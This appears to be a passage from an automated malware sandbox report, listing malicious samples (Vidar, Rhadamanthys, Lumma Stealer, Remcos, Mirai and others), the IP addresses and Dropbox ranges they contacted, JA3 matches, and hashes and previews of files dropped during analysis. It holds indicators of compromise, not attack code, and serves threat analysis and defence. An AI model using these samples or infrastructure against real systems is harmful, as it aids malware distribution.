                                                                                                                                                                                                                                                                  pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  tasktow.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  fg.microsoft.map.fastly.netR4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  ko.ps1.2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  122046760.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  pkqLAMAv96.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  IIC0XbKFjS.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  873406390.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  0J3fAc6cHO.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                  KjECqzXLWp.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                  cey4VIyGKh.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 199.232.214.172

                                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  DROPBOXUSRFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.21.1
                                                                                                                                                                                                                                                                  hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                  kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 162.125.113.170
                                                                                                                                                                                                                                                                  sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                  DROPBOXUSRFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.21.1
                                                                                                                                                                                                                                                                  hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                  kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 162.125.113.170
                                                                                                                                                                                                                                                                  sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  mjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.65.18

                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eg1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                  KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                  • 3.124.142.205
                                                                                                                                                                                                                                                                  • 162.125.69.15

                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.8524972280412774
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugP:gJjJGtpTq2yv1AuNZRY3diu8iBVqF7
                                                                                                                                                                                                                                                                  MD5:96AB093A750C778816751FD1E2E46712
                                                                                                                                                                                                                                                                  SHA1:7D75933690F7EC78F225BA05811B0773D4409650
                                                                                                                                                                                                                                                                  SHA-256:FECAE13B79CB8298F64BE28E0BC30713CCF2696CF17225EF4E1E5E585A8D51F3
                                                                                                                                                                                                                                                                  SHA-512:8676BC832A2ACF0921B769FB3AC51679C66F3AA39DF28D8A50187EC89C79DD978A732798CDC43CC104A78B4990D0A8A261AF7E6D7D3ABFB4E124C5EAF7E03688
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x85a7ae8a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6586155818377512
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                                  MD5:84D83BF921921CA588695B578437F017
                                                                                                                                                                                                                                                                  SHA1:2D185AEB77258E066D91A1BF46BF80B4999BFEFA
                                                                                                                                                                                                                                                                  SHA-256:8C80B04C3B047827B4A9BA1C0DA8D1E8C279AC8C2D68AAEE8F28A1783F8A3E97
                                                                                                                                                                                                                                                                  SHA-512:A5815ACB68AE4692CA0912984796B393B50E8F36E4DA493AC7798FEB3986F86FE15787D4498C11C7A0D3AC86ACCF23EB45957C1C176DE40B59517BE26DE20A3F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:....... ...............X\...;...{......................0.z..........{...,...|E.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................Z.U..,...|e...................c..,...|E..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                  Entropy (8bit):0.08116598326342322
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:KkYeAnVGkGuAJkhvekl1p326allrekGltll/SPj:KkzInrxlLkJe3l
                                                                                                                                                                                                                                                                  MD5:45BA5F33C3D40A8EF75DD1032FEEDE23
                                                                                                                                                                                                                                                                  SHA1:F2D4D3997C140F8EDD96D6DB6F9F021DD83B4D8A
                                                                                                                                                                                                                                                                  SHA-256:618BC877FFF227D1412D506E295A139AA398348413C67C7B77B993379F4B4098
                                                                                                                                                                                                                                                                  SHA-512:BF8D2F34FBEB9DFB8DDDDFFCC259193FC2D6FEFBC133795DB93311417A443C11A397403CCD263184B4F9BB7AE19EDCD83FA62BA09608AD86BA71F3785BC482FC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.&I9.....................................;...{...,...|E......{...............{.......{...XL......{....................c..,...|E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_10fc956f-b846-4718-b725-2b27096c5933\Report.wer

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6603873540798844
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:gjFEh3epqigKJtts3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/n:a+OHnttxR0apYKjqzuiF8Z24lO8JOL
                                                                                                                                                                                                                                                                  MD5:550EBC0F5BD47B27828EEDB62641161C
                                                                                                                                                                                                                                                                  SHA1:CC57F3BA152B58256CC064A3307BECC2E01A011B
                                                                                                                                                                                                                                                                  SHA-256:6EAA04D033EEBEEF2D3A8B2B166B7EAB554F76DF4E6C17AE3348843BFD2D43F8
                                                                                                                                                                                                                                                                  SHA-512:E45CF826D3665343CA827109AE6891AF4E6BB36019B99A40BEFD92D04B3ED995B9763E7CA363D3C43F48F02D8F1C21A540C0E8F36A49514B7769F697784D6541
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.8.5.9.1.5.1.5.3.3.1.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.8.5.9.1.5.8.2.6.5.4.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.f.c.9.5.6.f.-.b.8.4.6.-.4.7.1.8.-.b.7.2.5.-.2.b.2.7.0.9.6.c.5.9.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.c.7.6.1.4.c.-.2.c.d.e.-.4.7.f.c.-.8.e.1.9.-.8.1.f.5.b.f.f.1.f.8.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.7.c.-.0.0.0.1.-.0.0.1.4.-.5.6.9.3.-.e.c.d.7.1.3.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB23.tmp.dmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 12:45:15 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):48278
                                                                                                                                                                                                                                                                  Entropy (8bit):1.26452027783164
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:5S8bSRIREZeynagul7i7TW6SgV25zzUQXFWIwPIo13YSc:v+Xp+OTJSJ97IGSc
                                                                                                                                                                                                                                                                  MD5:504A4F0EF015DD8D19747397A8DBB7F7
                                                                                                                                                                                                                                                                  SHA1:CFFB97E1EBD2A7F2FCBF3F22C4064CA799C9D5FE
                                                                                                                                                                                                                                                                  SHA-256:89383B0FF3BEFB7D3DE9D2300AA0422001B8DE8F4A2DFD3663BF38C54F328D50
                                                                                                                                                                                                                                                                  SHA-512:433531CFA0B5B6020AA8CC4746F3BECE5A6BE5157BBC7EC749417F3A5AEF5CD7D6AA897BFF8BB782202CE9B8BB66BD093BCC44FB981A7D7B80AB6C87EC9E1D25
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MDMP..a..... .......[.dg........................................2!..........T.......8...........T......................................................................................................................eJ..............Lw......................T.......|!..W.dg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBFF.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8816
                                                                                                                                                                                                                                                                  Entropy (8bit):3.695099504584607
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ6QXq76Y3TIfCgmfr57vnpDv89b7lFfcXpm:R6lXJV26YjIfCgmfrFvi7Hfc0
                                                                                                                                                                                                                                                                  MD5:401F59AD9CAB602A6AD443B74A6DA441
                                                                                                                                                                                                                                                                  SHA1:1C453CEFE12A9444E41532B48090179652AA0AB3
                                                                                                                                                                                                                                                                  SHA-256:F03CA18BA0142BB3F2BE2883228B2FAB687AFC51543392F8800CA46CE1F046CE
                                                                                                                                                                                                                                                                  SHA-512:E9733A678FFCC7C4BB528C33EBA653CF9B1BAAD5BA90C7717B684E2150098656DF4C11E6746460AAD5CBBD792FB8138409EEB7BEE58D1F3BDE9059A759E1A48A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.5.7.2.<./.P.i.

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC5E.tmp.xml

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4853
                                                                                                                                                                                                                                                                  Entropy (8bit):4.445806788906492
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsnJg771I97AWpW8VYwFYm8M4Jk5LvM6FvMFyq8vU5LvMeSaMuNFd:uIjfJI7E57Vn0JcjMCMFWsjM11u3d
                                                                                                                                                                                                                                                                  MD5:AF815D6EFABC9386FEE88DBA40EB6C01
                                                                                                                                                                                                                                                                  SHA1:D589F0A250C792E60307963E690AB47288DA6247
                                                                                                                                                                                                                                                                  SHA-256:EB05C2276BAFF8F3932A3EE43C7155D3B52B610AA11312024B2206E1AFBAE0CD
                                                                                                                                                                                                                                                                  SHA-512:781E1D2AC3EC569B069EF63F9226BEC247612D869C345211E71DCFD092529E4C41751894EF143AC712CCB59C8D3F610C2753ED419C11D633A4E2168EE29A386B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638147" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\31f8079e-9b24-4ede-8322-43ebdbc6ad03.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):45636
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089709614698392
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:pMkbJrT8IeQc5VoyNzguhDO6vP6O8PTNBHU2D75q5EJNQhv5ZYCAoFGoup1Xl3jm:pMk1rT8Htoy86aNNNQh3YRoFhu3VlXrI
                                                                                                                                                                                                                                                                  MD5:AEEF1518BFE264CBDB3CB7F46311991F
                                                                                                                                                                                                                                                                  SHA1:543C57747B340D066733E9DD9166039B272B09A0
                                                                                                                                                                                                                                                                  SHA-256:5743D36B6316B5F4582145C5C1FD6355F2DAB7AD0773F0A07E10E1A72830C891
                                                                                                                                                                                                                                                                  SHA-512:B23ED1B0AA384D47D84F02F7E843A0CA0D4AEAC67A97E3A5ACB0B030369E7696CC3EE79777DAF6DD3B8D38ECB434B76A2B162340037A9F263E5FC43DE2A4BCB4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612264"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\3648c941-4e0b-4881-ab46-ec578869681f.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):45636
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089708606542304
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:pMkbJrT8IeQc5V9yNzguhDO6vP6O8PTNBHU2D75q5EJNQhv5ZYCAoFGoup1Xl3jm:pMk1rT8Ht9y86aNNNQh3YRoFhu3VlXrI
                                                                                                                                                                                                                                                                  MD5:A1F59E09EB08A356A4B23FB0E8E8C2F8
                                                                                                                                                                                                                                                                  SHA1:D15A2DD35896A0B3D98AE66DEC9404775E39918A
                                                                                                                                                                                                                                                                  SHA-256:CC37AE38391DC8BFC6ACAB95E04E98D2C87F04F4AC3BBEEE0985AC5CF97BA9EB
                                                                                                                                                                                                                                                                  SHA-512:A12BF761BEC4D3EAE595005531A2B040EA5F4A7585A6D39FAE80003ADCD01C4A08EAE464C06116A2191F9735B213CE28222E47CC6C7DDA86B744AD32ED2C6347
                                                                                                                                                                                                                                                                  Malicious:false
